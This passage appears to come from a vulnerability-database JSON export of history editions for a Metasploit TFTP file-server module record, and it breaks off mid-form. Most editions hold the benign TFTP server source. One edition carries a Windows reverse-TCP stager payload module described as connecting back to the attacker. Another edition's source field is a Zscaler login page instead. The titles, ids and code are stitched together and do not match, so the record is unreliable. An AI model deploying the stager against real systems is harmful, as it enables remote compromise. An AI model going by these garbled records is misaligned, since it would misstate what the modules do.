#{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-03T14:03:56", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-04T07:57:30", "history": [], "viewCount": 41, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2019-06-04T07:57:30"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:040A4A9D0367AA2E807A97FB83D00240", "THREATPOST:32543D9C50E016B8E5F07112935E35F8", "THREATPOST:BAD51469E5397055C24BA057979CD8C8"]}, {"type": "redhat", "idList": ["RHSA-2019:1456"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:548A2D8484377A20A276BF58474488F7"]}, {"type": "thn", "idList": ["THN:9B966D7333226606F54AD717A81F6D7E"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-69474"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A2A267E7C20665C55127A15BC5B9F7BD"]}, {"type": "symantec", "idList": ["SMNTC-108651", "SMNTC-108634", "SMNTC-108599", "SMNTC-108623", "SMNTC-108571", "SMNTC-108643", "SMNTC-108648", "SMNTC-108641", "SMNTC-108654", "SMNTC-108600"]}], "modified": "2019-06-04T07:57:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-04T07:57:30", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 20}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "7a01c7b276e979c83feaadb7c4656ef1", "type": "metasploit", "bulletinFamily": "exploit", "title": "VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/stephenfewer/ReflectiveDLLInjection", "https://github.com/rapid7/ReflectiveDLLInjection"], "cvelist": [], "lastseen": "2019-06-21T16:38:05", "history": [], "viewCount": 41, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2019-06-04T07:57:30"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:040A4A9D0367AA2E807A97FB83D00240", "THREATPOST:32543D9C50E016B8E5F07112935E35F8", "THREATPOST:BAD51469E5397055C24BA057979CD8C8"]}, {"type": "redhat", "idList": ["RHSA-2019:1456"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:548A2D8484377A20A276BF58474488F7"]}, {"type": "thn", "idList": ["THN:9B966D7333226606F54AD717A81F6D7E"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-69474"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A2A267E7C20665C55127A15BC5B9F7BD"]}, {"type": "symantec", "idList": ["SMNTC-108651", "SMNTC-108634", "SMNTC-108599", "SMNTC-108623", "SMNTC-108571", "SMNTC-108643", "SMNTC-108648", "SMNTC-108641", "SMNTC-108654", "SMNTC-108600"]}], "modified": "2019-06-04T07:57:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-21T16:38:05", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 21}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-21T22:43:48", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 2.1, "vector": "NONE", "modified": "2019-06-21T22:43:48"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1109254743703769798", "KITPLOIT:6640979275825511240"]}, {"type": "threatpost", "idList": ["THREATPOST:C47F49D9725508ED836D7FCD6D957077", "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1831-1:3FBA4", "DEBIAN:DLA-1789-2:82C69", "DEBIAN:DSA-4447-2:8C972"]}, {"type": "thn", "idList": ["THN:3740262E7693548F88688CB1EEDC492A", "THN:8A48B621ABB3BFA5403C0ECA54CBE534"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:36F3CC3E249355A592453C791E236092"]}, {"type": "talosblog", "idList": ["TALOSBLOG:688BE6618140B4A2CFD5100D561798BE"]}, {"type": "cve", "idList": ["CVE-2019-1904", "CVE-2019-12919", "CVE-2018-15890", "CVE-2018-16119"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310141281", "OPENVAS:1361412562310140837"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994644"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B6E332FAFDE207EBF7815D34BA7B6CB6"]}, {"type": "securelist", "idList": ["SECURELIST:0E5C78D5A5BB7C5BD0B8EA97F3F8D8E4"]}], "modified": "2019-06-21T22:43:48"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-21T22:43:48", "differentElements": ["sourceData"], "edition": 22}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "ed074c5ad19db796fb0abada3d771a61", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-07T18:02:59", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 3.8, "vector": "NONE", "modified": "2019-07-07T18:02:59"}, "dependencies": {"references": [{"type": "myhack58", "idList": ["MYHACK58:62201994902"]}, {"type": "cve", "idList": ["CVE-2019-10639", "CVE-2018-14733", "CVE-2019-1890", "CVE-2019-1886", "CVE-2018-20850"]}, {"type": "threatpost", "idList": ["THREATPOST:877715F6B7B3157A0BB04907D85EE1F6"]}, {"type": "kitploit", "idList": ["KITPLOIT:6269408450657572101", "KITPLOIT:2549439882250233553"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891844", "OPENVAS:1361412562310891843"]}, {"type": "zdt", "idList": ["1337DAY-ID-32954", "1337DAY-ID-32955"]}, {"type": "exploitdb", "idList": ["EDB-ID:47076"]}, {"type": "securelist", "idList": ["SECURELIST:9A6AC9776541651616898893ADB1716A"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1844-1:DE689"]}, {"type": "thn", "idList": ["THN:4D88AC2FA8EC904F3CE016D6C763499C"]}, {"type": "ubuntu", "idList": ["USN-4038-4", "USN-4038-3"]}, {"type": "f5", "idList": ["F5:K00724442"]}], "modified": "2019-07-07T18:02:59"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "<!-- username.html--><!DOCTYPE html><html><head><meta http-equiv=\"content-type\" content=\"text/html; charset=UTF-8\"><meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"><title>Welcome To Zscaler Directory Authentication</title><style type=\"text/css\">body { background-color: #FFF; font-family: Arial, sans-serif; font-size: 12px; text-align: center; color: #4B4F54; overflow: hidden; margin: 0;}a { color: #009dd0; cursor: pointer; text-decoration: none;}form { width: 100%; height: 100%; margin: 0; padding: 0;}input { font-family: Arial; font-size: 100%; margin: 0; width: 100%; vertical-align: top; color: #424242; display: inline-block; border: none; padding: 0; text-align: left; height: 100%; width: calc(100% -35px);}table { margin-top: 10px; text-align: center; background-color: white;}table.table-company-logo { background-color: #e3e3e3;}table.table-upper { border-radius: 10px;}table.table-lower { border-bottom-left-radius: 10px; border-bottom-right-radius: 10px; background-color: #f3f3f3;}table.table-field-label { margin-bottom: 2px;}table.table-field-input div.input-wrapper { display: block; border-color: #2a2c30;; width: inherit; padding-left: 10px;}table.table-field-input .input-wrapper.disabled { border-color: #cfd0d1;}table.zsc-company { border-bottom-left-radius: 10px; border-bottom-right-radius: 10px; background-color: #f3f3f3;}table.zsc-company td { border-bottom-left-radius: 10px; border-bottom-right-radius: 10px; font-size: 11px; color: #939393;}.table-half-column-fixed { width: 356px;}table + table, td table { margin-top: 0;}td.td-field-label { font-size: 16px; color: black;}td.td-field-act { font-size: 13px; color: #009dd0;}td.td-field-act img { vertical-align: middle;}img { max-height: 80px; max-width: 430px;}img.act-icon { padding-right:3px;}.or { background: #ff9500;}.gr { background: #e3e3e3;}.gy { background: #939597;}.yl { background: #ffc800;}.red { background: #c20000;}.pg { position: absolute; top: 0; bottom: 0; left: 0; right: 0; white-space: nowrap; height: 100%; overflow: auto;}.pg:before { content: \"\"; display: inline-block; height: 100%; vertical-align: middle;}.pg_cont { display: inline-block; vertical-align: middle; width: 100%;}.m_tbl { width: 90%; min-width: 600px; max-width: 758px; max-height: 258px; background: #FFF; white-space: normal; border: 3px solid #399c1d; border-radius: 10px;}.m_tbl.tbl_error { border-color: #77797c;}.eu_h.tbl_error { color: #77797c;}.eu_h { vertical-align: middle; font-weight: bold; border-radius: 10px; font-size: 24px; color: #399c1d; font-weight: normal; padding: 20px 20px 0 20px;}.sm { font-size: 20px; color: #696A6D; font-weight: normal;}.eu_co { font-size: 14px; color: #696A6D; white-space: normal; padding: 0 20px;}.eu_co.bsubmit { padding: 0 20px 20px 20px;}.eu_l { width: 500px; overflow: hidden; text-overflow: ellipsis; margin: 0 auto; line-height: normal;}.eu_l a { color: #0069AA; word-break: break-word;}.bh { min-height: 40px; display: block; max-height: 80px; color: #0076A9; font-size: 32px; overflow: hidden; padding-bottom: 15px;}.btn { background: #009dd0; color: #FFFFFF; border-radius: 5px; border: 2px solid #009dd0; cursor: pointer; display: inline-block; height: 30px; margin: 15px 0 15px; font-size: 18px; line-height: 26px; width: auto; padding: 0 20px;}.btn:focus, input:focus { outline: none;}.btn:hover { background: #fff; color: #0076A9;}.fo { height: 40px; line-height: 40px; font-size: 11px; padding-bottom: 0px; background-color: #f3f3f3; width: 100%; border-bottom-left-radius: 7px; border-bottom-right-radius: 7px; padding-left: 25px;}.ln { font-size: 13px; padding: 0 0 35px; font-style: italic;}.pb20 { padding-bottom: 20px;}.pb35 { padding-bottom: 35px;}.eu_co.st { font-size: 12px; padding: 10px 0; line-height: 20px; position: relative;}.ie-label { display: none;}.w-sp { -webkit-animation: spinner .8s linear infinite; animation: spinner .8s linear infinite; border: 2.5px solid #c6c6c6; border-radius: 100%; display: inline-block; height: 13px; position: relative; width: 13px; vertical-align: middle; top: -2px; margin-right: 6px;}.w-sp.grn { border-top-color: #399c1d;}.w-sp.gry { border-top-color: #77797c;}@-webkit-keyframes spinner { to { -webkit-transform: rotate(360deg); }}@keyframes spinner { to { transform: rotate(360deg); }}.not { color: #fd4239; font-size: 16px; padding-left: 0; padding-top: 0;}.demo-icon { color: green;}.s_img { vertical-align: bottom; padding-right: 5px; background: url(\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADoAAAAMCAYAAAAzmK6YAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyhpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTExIDc5LjE1ODMyNSwgMjAxNS8wOS8xMC0wMToxMDoyMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTUgKE1hY2ludG9zaCkiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6MDg4M0FBNkZBODFFMTFFNUI3RkJGMDcxMjM1MjFGQjUiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6MDg4M0FBNzBBODFFMTFFNUI3RkJGMDcxMjM1MjFGQjUiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDowODgzQUE2REE4MUUxMUU1QjdGQkYwNzEyMzUyMUZCNSIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDowODgzQUE2RUE4MUUxMUU1QjdGQkYwNzEyMzUyMUZCNSIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PkDA4BkAAANHSURBVHja1JZpSBVhFIaveevaQpGRqaVkC5UWSiutkCVtRlaWtlhRli3+CPtREBFFBUULoVBhEYVYtEALEgZmC4ZEJBFEciuznVKIdjW098BzZbqo+c/64HGcmW++Oed873nnBjQ0NLhs5OTkuJoY8WK5GCn6CI94K26Io+K+6x8ZmZmZLd53+51bMtGiXswXax33noqzokh8FJ/aOLcBxPm8NZPd7GZnHXaLZaK735wf4oJ4IdqLUHGzjZO0OArEF9T21xGQnZ3tIZHEZuZY1b6LR2IvCY8WE0WEqBGPxUVR4nhukujL83X2LlEh7ok5Ik68F1doB1+rjBNV4hL3O4kkMYh5l0UHUSnyRJoYIyazKVcl48Zd1ibavTBLNIN+a258FltYdIVYSUXtehBS9zB3s9jH/ydEMhKPINGD9lIxTbwRw8QzMZwiWqtUix5Ici7rDCGxaIp5TJwWS0VvnrV26kkxRhBjHgUvaac/i1pI8rWYKo6ICSQ3Wwyl8hZglBWO+Sb/GP5fQ8Db2dXzwsv7TEFTRCpKyCTJdRRlFV5gwW4TY8USUS66ivHiJ3MtyR0ikneFiwSSNFmnmCJsR58gC/9RzQNlrewb25l+YrE4w7VNYr84LDaKWBKwAnwT18QukSu6NRGHyXuro3i2sycpboiw2OfRVr9YwzwkG3VlScaHfGZU3kyiWY4kB4uZ9GYves5c+DbHGSRZKx6KQF6WhtxPOdY1OfanT5NZz86LHXNCkHgRMaRwXihe4Se3xED6Pp3WiCCG6axT7HTdA2IWwfnGHXogCjksFB39CpGA1Hyjgl72Yhi25nURzK6Y7K26D8QGkkliV0OR8mp2MRkzCsboInnWVPOSXrzLMYZet4KtRyFxKNLb6Lr2g0HOlMpCoVy3Pvog8lmgpVGJQZmbfuWlBbhxIK7ppo/MODJwTTOP42KPWECvheHqO9m9c2IUPV5KL8dT0EQ+hbmo6R1ml8/nr1SyTf8jUWw4HL2HYBCFrUjSi6zK/L7NboLzjXaYh4vggqh4rWOOfcu7UOAGx/VQnvX9QAni6FvPw5rVSqxOeQQwp0bn9U0l6p9ELK7lwXnjcLw6ql7AZ6nqf/gJ+FuAAQDyhegdUpDo7QAAAABJRU5ErkJggg==\") no-repeat; width: 55px; height: 17px; display: inline-block;}.f_btn + .f_btn { margin-left: 5px;}.f_btn { display: inline-block;}.arrow-box { padding: 15px; position: absolute; background: white; text-align: left; line-height: 16px; width: 295px; top: -40px; display: none; z-index: 10; border: 1px solid #c2a200; border-radius: 5px; padding: 15px; color: #c2a200; font-size: 13px;}.arrow-box li { list-style-type: none; color: #2a2c30;}.arrow-box-left { top: -10px; left: -335px;}.arrow-box-left:after, .arrow-box-left:before { left: 100%; top: 53px; border: solid transparent; content: \" \"; height: 0; width: 0; position: absolute;}.arrow-box-left:after { border-color: transparent; border-left-color: #FFFFFF; border-width: 5px; margin-top: -34px;}.arrow-box-left:before { border-color: transparent; border-left-color: #c2a200; border-width: 6px; margin-top: -35px;}.arrow-box-right { right: -335px; top: -20px;}.arrow-box-right:after, .arrow-box-right:before { right: 100%; top: 53px; border: solid transparent; content: \" \"; height: 0; width: 0; position: absolute; pointer-events: none;}.arrow-box-right:after { border-color: transparent; border-right-color: #FFFFFF; border-width: 5px; margin-top: -24px;}.arrow-box-right:before { border-color: transparent; border-right-color: #c2a200; border-width: 6px; margin-top: -25px;}.input-wrapper { height: 30px; line-height: 30px; margin-bottom: 10px; border: 1px solid #b0b0b0; position: relative; display: block; width: inherit; padding-left: 10px;}.input-wrapper div.input-wrapper-div-text { text-align: left; color: #b0b0b0; max-width: 334px; overflow: hidden; text-overflow: ellipsis;}.input-image { width: 17px; display: inline-block; vertical-align: middle; height: auto; float: left; position: absolute; top: 5px; width: 20px; height: 20px; left: 7px;}.input-wrapper.dotted-border { border: none; border-bottom: 1px dotted #77797C;}.error-content { overflow-y: auto; height: auto;}.error-content li { list-style-type: none;}.text-label-link { height: 32px; line-height: 32px; margin-bottom: 10px; text-align: left; padding-left: 10px; position: absolute; top: 0px; right: -100px;}.text-label-link.pwd { right: -140px;}.text-label-link:before { content: \"<<\"; letter-spacing: -0.15em; padding-right: 2px; font-size: 8px; line-height: 11px; color: #3892B8; vertical-align: middle;}.username { width: calc(100% -35px); display: inline-block; vertical-align: top; color: #424242; position: relative; overflow: hidden;}.button-link { width: auto; height: auto; background: none; color: #0076A9; text-decoration: underline; cursor: pointer; vertical-align: middle;}.hide { display: none;}.err-tri { width: 0; height: 0; border-top: 15px solid transparent; border-bottom: 15px solid transparent; position: absolute; top: 40px;}.err-tri-to-left { border-right: 15px solid #FF9130; left: -15px;}.err-tri-to-right { border-left: 15px solid #FF9130; right: -15px;}.err-tri-new { display: none; -ms-transform: rotate(45deg); -webkit-transform: rotate(45deg); transform: rotate(45deg); width: 16px; height: 16px; /*right: -9px; top: 47px;*/ right: -14px; top: 6px; position: absolute; border: 1px solid #c2a200;}.username_placeholder { font: 14px/normal sans-serif; left: 7px; top: 8px; width: 332px; height: 20px; position: absolute; overflow-x: hidden; font-size-adjust: none; font-stretch: normal; text-align: left; color: #939393;}.username_input { position: relative; top: 6px; height: 20px; left: -27px; z-index:15;}input.username_input { width: 295px;}.table-left-column, .table-right-column { width: 50%; display: inline-block;}.table-left-column table { padding-right: 10px;}.table-right-column table { padding-left: 10px;}.separator { height: 14px; margin-left: 8px; margin-right: 8px; border-left: 1px #cfd0d1 solid;}hr { background-color: #cfd0d1; margin-top: 16px; margin-bottom: 16px;}.eu_sh { font-size: 16px; color: #929496; vertical-align: middle; padding: 10px 20px 0 23px;}.eu_h_t { padding-left: 23px; font-size: 16px; color: #2a2c30;}.eu_h_t span { color: #009dd0;}.eu_co_aup_txt { font-size: 13px; color: #2a2c30; padding: 0 20px 0 23px;}.eu_co_aup_txt div { max-width:715px; word-wrap: break-word; overflow-x: hidden;}.eu_h_t_sub { font-size: 16px; color: #77797c; padding: 0 0 0 23px; display: inline-block; padding-bottom: 15px; margin-right: -15px;}.eu_h_t_sub_a { padding-left: 0; padding-bottom: 15px; display: inline-block; text-align: left;}.eu_h_t_sub_a a { font-size: 16px; color: #009dd0; padding: 0 0 0 23px; width: 215px;}.otp { background-color: white; padding-left: 0; padding-top: 16px; font-size:11px;}@media only screen and (max-width:640px) { .eu_l { width: 250px; } .input-wrapper { width: 100%; } .arrow-box { background: #FFFFFF; border: 1px solid #c2a200; width: 524px; } .arrow-box-right { top: -140px; left: -1px; } .arrow-box-left { top: -80px; left: -3px; } .arrow-box-left:after, .arrow-box-left:before, .arrow-box-right:after, .arrow-box-right:before { top: 117%; left: 48%; border: solid transparent; content: \" \"; height: 0; width: 0; position: absolute; } .arrow-box-right:after { border-color: transparent; border-top-color: #FFFFFF; border-width: 15px; margin-left: -15px; margin-top: -20px; } .arrow-box-right:before { border-color: transparent; border-top-color: #c2a200; border-width: 16px; margin-left: -16px; margin-top: -20px; } .arrow-box-left:after { border-color: transparent; border-top-color: #FFFFFF; border-width: 15px; margin-left: -15px; margin-top: -9px; } .arrow-box-left:before { border-color: transparent; border-top-color: #c2a200; border-width: 16px; margin-left: -16px; margin-top: -9px; } .text-label-link, .text-label-link.pwd { right: 0; top: 25px; } .table-left-column, .table-right-column { width: 100%; display: block; } .table-left-column table, .table-right-column table { padding-left: 0; padding-right: 0; } .eu_co_aup_txt div { white-space: normal; word-wrap: break-word; }}@media only screen and (max-width: 480px) { .table-half-column-fixed { width: inherit; } input.username_input { left: -2px; width: 100%; } .eu_co_aup_txt div { white-space: normal; word-wrap: break-word; } .m_tbl { min-width: 300px; } .pg_cont { position: relative; left: -3px; } .fo { text-align: center; }}</style><style type=\"text/css\">.bh.bh-scaled {overflow:visible;}</style><!--[if lte IE 7]><style type=\"text/css\">.act-icon {display: none;}</style><![endif]--><!--[if lte IE 7]><style type=\"text/css\">.ie-label {position: absolute;left: 5px;top: 10px;display: block;}.username_input {position: relative;top: 5px;height: 20px;left: -27px;}.username_placeholder {left: 7px;}</style><![endif]--><!--[if lte IE 8]><style type=\"text/css\">.table-left-column, .table-right-column {width: 100%;display: block;}.table-left-column table, .table-right-column table {padding-left: 0;padding-right: 0;}.arrow-box {background: white;border: 1px solid #c2a200;width: 95%;z-index: 100;}.arrow-box-right {top: -140px;left: -1px;}.arrow-box-left {top: -80px;left: 2px;}.arrow-box-left:after, .arrow-box-left:before,.arrow-box-right:after, .arrow-box-right:before {top: 117%;left: 48%;border: solid transparent;content: \" \";height: 0;width: 0;position: absolute;}.arrow-box-right:after {border-color: transparent;border-top-color: #FFFFFF;border-width: 15px;margin-left: -15px;margin-top: -20px;}.arrow-box-right:before {border-color: transparent;border-top-color: #c2a200;border-width: 16px;margin-left: -16px;margin-top: -20px;}.arrow-box-left:after {border-color: transparent;border-top-color: #FFFFFF;border-width: 15px;margin-left: -15px;margin-top: -9px;}.arrow-box-left:before {border-color: transparent;border-top-color: #c2a200;border-width: 16px;margin-left: -16px;margin-top: -9px;}</style><![endif]--><!--link href=\"/chf.css\" rel=stylesheet type=\"text/css\"--><script language=\"JavaScript\" type=\"text/JavaScript\">function getIEVersion() {var myNav = navigator.userAgent.toLowerCase();return (myNav.indexOf('msie') != -1) ? parseInt(myNav.split('msie')[1]) : false;}function validate(myform) {myform.lognsfc.value = myform.lognsfc.value.trim();var ln = myform.lognsfc.value;var error = document.getElementById(\"error-text\");if (ln == \"\") {error.style.display = \"block\";error.innerHTML = \"Please enter a login name in the form of an email address\";return false;}if (!ln.match('^([0-9a-zA-Z $#!%&\\'*+-/=?^_`{|}~]+[-._+&])*[0-9a-zA-Z $#!%&\\'*+-/=?^_`{|}~]+@([-_0-9a-zA-Z]+[.])+[a-zA-Z]{2,16}$')) {error.style.display = \"block\";error.innerHTML = \"The Login ID must be a valid email address\";return false;}error.style.display = \"none\";return true;}function delcookie(name) {document.cookie = name + '=1; expires=Thu, 01-Jan-70 00:00:01 GMT;';}function delete_fchcookie() {delcookie(\"_sm__fch\");}</script></head><body onload=\"delete_fchcookie()\"><div id=\"main-page\" class=\"pg gr\"><div class=\"pg_cont\"><!-- --><div id=\"flashform\" style=\"display:block;\"><form 